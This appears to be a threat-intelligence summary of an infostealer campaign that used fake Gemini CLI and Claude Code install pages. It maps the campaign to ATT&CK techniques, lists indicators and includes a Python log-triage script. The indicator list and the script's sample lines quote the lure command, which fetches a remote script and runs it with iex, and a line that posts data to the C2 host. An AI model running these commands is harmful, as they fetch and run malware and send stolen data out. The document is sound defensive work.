SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer

EclecticIQ reports a financially motivated infostealer campaign that impersonates Gemini CLI, Claude Code, Node.js, Chocolatey, and other developer tools to trick users into running a hidden PowerShell installer. The malware steals credentials, OAuth tokens, session cookies, files, and system data from Windows endpoints, then exfiltrates them to command-and-control servers and can also execute operator-supplied follow-on payloads. #GeminiCLI #ClaudeCode #Nodejs #Chocolatey #MIRhosting #RedLine #LummaC2

Keypoints

  • Threat actors used SEO poisoning to place fake AI-tool installation pages above legitimate results in search engines.
  • The campaign specifically impersonated Gemini CLI and Claude Code, with additional lures for Node.js, Chocolatey, KeePassXC, and Monero.
  • Victims were prompted to paste a PowerShell one-liner that downloaded and executed a fileless infostealer in memory.
  • The malware disabled key Windows defenses by impairing ETW and AMSI before collecting data.
  • Stolen data included browser credentials, OAuth tokens, CI/CD secrets, VPN details, session cookies, cloud storage content, and local files.
  • The malware also supported arbitrary remote code execution, enabling hands-on-keyboard follow-on intrusion.
  • The broader infrastructure cluster used more than 30 domains and bulletproof hosting, indicating an ongoing coordinated campaign.

MITRE Techniques

  • [T1189] Drive-by Compromise – Victims were led to attacker-controlled installation pages through poisoned search results (‘The infection chain begins with a Google search… Threat actors use SEO poisoning to surface a fake domain at the top of search results’).
  • [T1608.006] Stage Capabilities: SEO Poisoning – Malicious domains were promoted above legitimate vendor pages (‘Threat actors use SEO poisoning to surface a fake domain at the top of search results’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – The payloads were executed entirely in memory with PowerShell (‘executes entirely in memory through PowerShell’).
  • [T1204.001] User Execution: Malicious Link – Users clicked through from search results to malicious sites (‘The victim clicks through, lands on a malicious page’).
  • [T1204.002] User Execution: Malicious File – Users were induced to paste and run a one-line PowerShell command (‘prompts the user to copy and paste a PowerShell command into their terminal’).
  • [T1027] Obfuscated Files or Information – The script was heavily obfuscated with junk branches (‘approximately 6,800 lines of junk code branches’).
  • [T1140] Deobfuscate/Decode Files or Information – The C2 task list was decrypted at runtime (‘The implant decrypts it, splits it into records’).
  • [T1562.001] Impair Defenses: Disable or Modify Tools – AMSI was bypassed to prevent script scanning (‘the script… neutralize Microsoft Windows endpoint visibility by disabling… AMSI’).
  • [T1562.006] Impair Defenses: Indicator Blocking – ETW telemetry was suppressed by patching PowerShell logging (‘patches the PSEtwLogProvider.m_enabled flag’).
  • [T1497.001] Virtualization/Sandbox Evasion: System Checks – The malware checked for qemu-ga to avoid virtualized analysis (‘includes a qemu-ga string check as a basic anti-sandbox gate’).
  • [T1218] System Binary Proxy Execution – Shell.Application was used to launch hidden PowerShell (‘instantiates a Shell.Application COM object and calls ShellExecute with window style 0’).
  • [T1057] Process Discovery – The Restart Manager API enumerated running processes (‘Leverages the Restart Manager API… to enumerate running processes’).
  • [T1083] File and Directory Discovery – The stealer recursively enumerated user documents (‘Recursive listing of .txt and .docx files across Desktop, Documents, and Downloads’).
  • [T1555.003] Credentials from Web Browsers – Browser login data, cookies, autofill, and form history were extracted (‘Chromium-family browsers… Firefox’).
  • [T1555.004] Credentials from Windows Credential Manager – Stored Windows credentials were harvested via CredEnumerate (‘call CredEnumerate against Windows Credential Manager’).
  • [T1539] Steal Web Session Cookie – Session cookies from collaboration apps were stolen (‘Slack… Teams… Discord… Mattermost’).
  • [T1552.001] Unsecured Credentials: Credentials in Files – Credentials and keys were taken from config files (‘OpenVPN config files with embedded key material’).
  • [T1552.002] Unsecured Credentials: Credentials in Registry – Saved sessions and passwords were pulled from registry locations (‘WinSCP stored passwords from the registry’, ‘PuTTY saved sessions’).
  • [T1005] Data from Local System – Local synced cloud directories and user files were collected (‘Enumeration of locally synced directories for Proton Drive, iCloud Drive, Google Drive, MEGA, and OneDrive’).
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 communications used HTTP endpoints (‘communicates with events.msft23[.]com over three URL endpoints’).
  • [T1573] Encrypted Channel – Exfiltrated data and tasking were protected with encryption (‘exfiltrated data in encrypted form’, ‘RSA-encrypted task list’).
  • [T1105] Ingress Tool Transfer – Operator-supplied URLs were fetched and run on the victim host (‘run the operator-supplied URL via powershell.exe -command IEX(Invoke-WebRequest … )’).
  • [T1041] Exfiltration Over C2 Channel – Stolen data was sent to the /process endpoint (‘uploads exfiltrated host data’).
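As an added defender-side example (not code from the EclecticIQ report), the Python below turns the behaviours and domains listed above into a small triage check over PowerShell script block log text. The sample lines are constructed, and the regexes, function names and the Event ID 4104 framing are assumptions of this example.

```python
import re

# Defanged C2 and lure domains from the report's IoC list, refanged only for log matching.
IOC_DOMAINS = [d.replace("[.]", ".") for d in (
    "events[.]msft23[.]com", "events[.]ms709[.]com", "geminicli[.]co[.]com",
    "claudecode[.]co[.]com", "community.chocolatey[.]net",
)]

# Behavioural signatures built from the techniques quoted above: (ATT&CK id, regex).
SIGNATURES = [
    # irm/iwr piped into iex, or iex(irm ...): the paste-and-run first stage
    ("T1059.001", re.compile(
        r"\b(irm|iwr|Invoke-(Web|Rest)\w+)\b.*\|\s*(iex|Invoke-Expression)\b"
        r"|\b(iex|Invoke-Expression)\s*\(\s*(irm|iwr|Invoke-(Web|Rest)\w+)\b", re.I)),
    ("T1562.006", re.compile(r"PSEtwLogProvider|m_enabled", re.I)),   # ETW logging patch
    ("T1562.001", re.compile(r"\bamsi", re.I)),                       # AMSI tampering
    ("T1218", re.compile(r"Shell\.Application.*ShellExecute", re.I | re.S)),  # hidden launch
    ("T1497.001", re.compile(r"qemu-ga", re.I)),                      # anti-sandbox gate
    ("T1555.004", re.compile(r"CredEnumerate", re.I)),                # Credential Manager
]

def scan_script_block(text):
    """ATT&CK ids whose signatures fire on one script block or command line,
    plus 'IOC:<domain>' for each known C2/lure domain it references."""
    hits = [tid for tid, rx in SIGNATURES if rx.search(text)]
    lowered = text.lower()
    hits += [f"IOC:{d}" for d in IOC_DOMAINS if d in lowered]
    return hits

def triage(blocks):
    """Map each block that triggers at least one signature to its hits."""
    result = {}
    for block in blocks:
        hits = scan_script_block(block)
        if hits:
            result[block] = hits
    return result

# Constructed sample lines in the shape of PowerShell script block log text (Event ID 4104);
# not telemetry from the report. The second only names the ETW provider type.
SAMPLE_BLOCKS = [
    'powershell.exe -c "irm https://community.chocolatey.net/install.ps1|iex"',
    "$t = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')",
    "Get-ChildItem -Recurse $env:USERPROFILE\\Documents -Include *.txt,*.docx",
    "Invoke-RestMethod https://events.msft23.com/process -Method Post -Body $payload",
]

if __name__ == "__main__":
    for block, hits in triage(SAMPLE_BLOCKS).items():
        print(hits, "<-", block)
```

A benign recursive directory listing (the third sample) produces no hit, which is the intended behaviour: the check keys on the defence-impairment, download-and-execute and C2 artefacts the report describes, not on generic file enumeration.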

Indicators of Compromise

  • [Domains] Typosquatted installer and lure sites – geminicli[.]co[.]com, gemini-setup[.]com
  • [Domains] Claude Code impersonation and C2 – claudecode[.]co[.]com, claude-setup[.]com
  • [Domains] C2 and infrastructure – events[.]msft23[.]com, events[.]ms709[.]com
  • [Domains] Additional impersonation and lure domains – nodejs-setup[.]co[.]com, community[.]chocolatey[.]net, keepassxc[.]us[.]org, get-monero[.]co[.]uk, api[.]bio9438[.]com
  • [IP address] Bulletproof hosting node used for malicious infrastructure – 109.107.170[.]111
  • [File names] First-stage and payload script names – Install.ps1, powershell.exe -c "irm https://community[.]chocolatey[.]net/install.ps1|iex"
  • [SHA-256 hashes] Sample hashes listed in the report – ff81cb9263fcde5870a0748fd6af2d30a4ba864415c15ca14827d0dd723eb60c, 9c87e8162b39fbb773c416006b16f8e34aca53372d1b2d4a584df0ffc69ad333, and 28 more hashes

Read more: https://blog.eclecticiq.com/seo-poisoning-campaign-leverages-gemini-and-claude-code-impersonation-to-deliver-infostealer